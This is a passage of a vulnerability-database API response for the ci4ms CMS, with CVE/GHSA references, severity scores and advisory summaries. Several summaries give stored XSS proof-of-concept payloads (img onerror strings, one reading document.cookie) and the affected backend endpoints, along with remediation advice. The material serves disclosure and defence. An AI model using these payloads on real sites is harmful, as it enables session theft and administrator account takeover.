                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-85m8-g393-jcxf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-85m8-g393-jcxf"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34563",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34563"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-85m8-g393-jcxf",
                    "reference_id": "GHSA-85m8-g393-jcxf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-85m8-g393-jcxf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1126144?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34563",
                "GHSA-85m8-g393-jcxf"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pds3-bx1t-zfbt"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89743?format=api",
            "vulnerability_id": "VCID-q2ya-p1za-aug5",
            "summary": "CI4MS: System Settings (Company Information) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via System Settings – Company Information (Same-Page Attribute Breakout & Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Company Information Configuration Fields with Immediate Same-Page Execution\n\n### Description\nThe application fails to properly sanitize user-controlled input within **System Settings – Company Information**. Several administrative configuration fields accept attacker-controlled input that is stored server-side and later rendered without proper output encoding.\n\nAffected fields include, but are not limited to:\n1. Company Name\n2. Slogan\n3. Company Phone\n4. Company Mobile\n5. Company Email\n6. Google Maps iframe link\n7. Company Logo and other media-related fields\n\nUnlike the public-facing landing page injection vulnerability, this issue executes directly on the same settings page. The injected payload breaks out of the HTML attribute context and is immediately interpreted by the browser when rendered, resulting in same-page DOM-based stored XSS.\n\nThis represents different functionality and a separate vulnerability from public-facing rendering.\n\n### Affected Functionality\n- System Settings – Company Information configuration\n- Same-page rendering of user-controlled input fields\n- DOM attribute injection within form inputs\n- Storage and retrieval of company information values\n\n### Attack Scenario\n- An attacker injects a malicious JavaScript payload into one or more Company Information fields.\n- The payload breaks out of the HTML attribute context.\n- The application stores and re-renders the payload without sanitization or encoding.\n- The payload executes immediately on the same settings page.\n- The script executes in the browser context of the authenticated user managing settings.\n\n### Impact\n- Persistent Stored XSS\n- Immediate Same-Page DOM XSS execution\n- Execution of arbitrary JavaScript in victims’ browsers\n- Administrative privilege escalation\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire platform\n\nEndpoints:\n- `/backend/settings/` (Company Information)\n\n## Steps To Reproduce (POC)\n1. Navigate to System Settings -> Company Information\n2. Insert the following XSS payload into any Company Information field:\n`test\"><img src=1 onerror=alert()>\" class=\"form-control\" placeholder=\"Name\" required>`\n3. Save the settings\n4. Observe that the payload breaks out of the input attribute context\n5. The XSS executes immediately on the same page\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/qEcFUIjR#2OKX78JgPQI2x5957GE-vx1zYzJv2a9JqjyBsrRFBkk",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34562",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05587",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05574",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05571",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00023",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06593",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34562"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T19:48:03Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v897-c6vq-6cr3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T19:48:03Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v897-c6vq-6cr3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34562",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34562"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v897-c6vq-6cr3",
                    "reference_id": "GHSA-v897-c6vq-6cr3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-v897-c6vq-6cr3"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34562",
                "GHSA-v897-c6vq-6cr3"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q2ya-p1za-aug5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90225?format=api",
            "vulnerability_id": "VCID-rw6x-cp73-1bgj",
            "summary": "CI4MS: Permissions Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Group / Role Management Fields (Administrative Context Execution)**\n- Stored Cross-Site Scripting via Unsanitized Group / Role Management Inputs\n\n### Description\nThe application fails to properly sanitize user-controlled input within group and role management functionality. Multiple input fields (three distinct group-related fields) can be injected with malicious JavaScript payloads, which are then stored server-side.\n\nThese stored payloads are later rendered unsafely within privileged administrative views without proper output encoding, leading to stored cross-site scripting (XSS) within the role and permission management context.\n\n### Affected Functionality\n- Group creation and editing functionality\n- Role and permission assignment interfaces\n- Storage and retrieval of group-related data\n\n### Attack Scenario\n- An attacker injects a malicious XSS payload into one or more group-related input fields.\n- The application stores these values without sanitization or encoding.\n- An administrator views the group or role management interface.\n- The payload executes automatically in the administrator’s browser.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators\n- Full administrator account takeover\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/users/groupList/`\n\n## Steps To Reproduce (POC)\n1. Navigate to the Group / Role Management page\n2. Insert an XSS payload into any of the three group-related input fields such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the group or role changes\n4. View the group/role management page as an administrator\n5. Observe the XSS payload executing automatically\n\n## Remediation\n- Never use .html() again or any innerHTML-style like JS in your PHP, or any other sink, even if user inputs that flow into them are not clear, they still represent real world danger as an attacker can make use of this to exploit the application via XSS. And do HTML Encoding as much as possible and always do Sanitization, theres no sanitization there unfortunately. Also apply CSP, HttpOnly, SameSite, and Secure upon all application, they reduce severity of XSS & escalated-CSRF via XSS and do great jobs\n\n# Ready Video POC:\nhttps://mega.nz/file/6QUEXDbR#JXzYXg9bef_NeSUVFB4R03UeXLtAVtYwTRsdrHLlokU",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34557",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06184",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00025",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07262",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00025",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07305",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00025",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07329",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34557"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-rpjr-985c-qhvm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:10:40Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-rpjr-985c-qhvm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34557",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34557"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rpjr-985c-qhvm",
                    "reference_id": "GHSA-rpjr-985c-qhvm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rpjr-985c-qhvm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34557",
                "GHSA-rpjr-985c-qhvm"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rw6x-cp73-1bgj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90069?format=api",
            "vulnerability_id": "VCID-tbsh-y6wx-wfgt",
            "summary": "CI4MS: Stored Cross‑Site Scripting (Stored XSS) in Backend User Management Allows Session Hijacking and Full Administrative Account Compromise\n### Summary\n\nA critical Stored Cross-Site Scripting (Stored XSS) vulnerability exists in the backend user management functionality. The application fails to properly sanitize user-controlled input before rendering it in the administrative interface, allowing attackers to inject persistent JavaScript code. This results in automatic execution whenever backend users access the affected page, enabling session hijacking, privilege escalation, and full administrative account compromise.\n\n---\n\n### Details\n\nThe vulnerability resides in the backend user creation feature accessible via:\n\n```\n/backend/users\n```\n\nUser-supplied input in the **name** and **surname** fields is stored without proper validation or sanitization. When this data is later rendered in the backend users listing page, it is injected directly into the HTML without output encoding.\n\nBecause of this, attackers can embed malicious JavaScript payloads that execute in the context of authenticated backend users.\n\nThis indicates missing contextual output escaping (e.g., HTML encoding) and insufficient input sanitization, leading to persistent script execution.\n\nThe vulnerability is particularly severe because:\n\n* The payload is stored in the database (persistent XSS).\n* The script executes automatically on page load.\n* The affected page appears to be an administrative/backend interface, increasing the risk of privilege escalation.\n\n---\n\n### PoC\n\nSteps to reproduce:\n\n1. Navigate to:\n\n```\nhttp://localhost:8080/backend/users\n```\n\n2. Click **Add New User**.\n\n3. Create a new user.\n\n4. In the **name** and **surname** fields, insert the following payload:\n\n```\nadnan\"><img src=1 onerror=alert(document.cookie)><<e>img src=1 onerror=alert(document.cookie)>\n```\n\n5. Save the user.\n\n6. After saving, a popup displaying cookies will appear, demonstrating JavaScript execution.\n\n7. Revisit:\n\n```\nhttp://localhost:8080/backend/users\n```\n\n8. The popup automatically triggers again, confirming that the malicious script is stored and executed persistently.\n<img width=\"1534\" height=\"834\" alt=\"image\" src=\"https://github.com/user-attachments/assets/83f3d124-cf2e-472d-87cc-8c668ea81cba\" />\n\n---\n\n### Impact\n\nSeverity: **Critical**\n\nThis vulnerability enables:\n\n* Persistent execution of attacker-controlled JavaScript in privileged backend contexts.\n* Theft of session cookies, potentially leading to full account takeover.\n* Unauthorized actions performed on behalf of administrators (CSRF-like behavior via XSS).\n* Privilege escalation if a high-privilege user views the page.\n* Injection of keyloggers, credential harvesting scripts, or malicious redirects.\n* Full compromise of backend administrative functionality depending on role permissions.\n\nSince the payload executes automatically without user interaction once stored, exploitation requires minimal effort and can impact all backend users.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34571",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00061",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19371",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00061",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19322",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00061",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19367",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00071",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21799",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34571"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T15:11:23Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fc4p-p49v-r948",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T15:11:23Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fc4p-p49v-r948"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34571",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34571"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fc4p-p49v-r948",
                    "reference_id": "GHSA-fc4p-p49v-r948",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fc4p-p49v-r948"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34571",
                "GHSA-fc4p-p49v-r948"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tbsh-y6wx-wfgt"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89174?format=api",
            "vulnerability_id": "VCID-tje9-d65v-bbd4",
            "summary": "CI4MS: Account Deletion Module Grants Full Persistent Unauthorized Access for All‑Roles via Improper Session Invalidation (Logic Flaw)\n## Summary\n### Vulnerability: Improper Session Invalidation on Account Deletion (Broken Access Control / Logic Flaw)\n- This vulnerability is caused by a backend logic flaw that maintains a false trust assumption that already-authenticated users remain trustworthy, even after their accounts are explicitly deleted. As a result, administrative security actions do not behave as intended, allowing persistent unauthorized access.\n\n### Description\nThe application fails to immediately revoke active user sessions when an account is **deleted**. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions.\n\nThe system implicitly assumes that authenticated users remain trusted for the lifetime of their session. There is no session expiration or account expiration mechanism in place, causing deleted accounts to retain indefinite access until the user manually logs out. This behavior breaks the intended access control policy and results in persistent unauthorized access, representing a critical security flaw.\n\n### Affected Functionality\n- User session management and authentication logic\n- Account **deletion** mechanism\n- All authenticated endpoints, 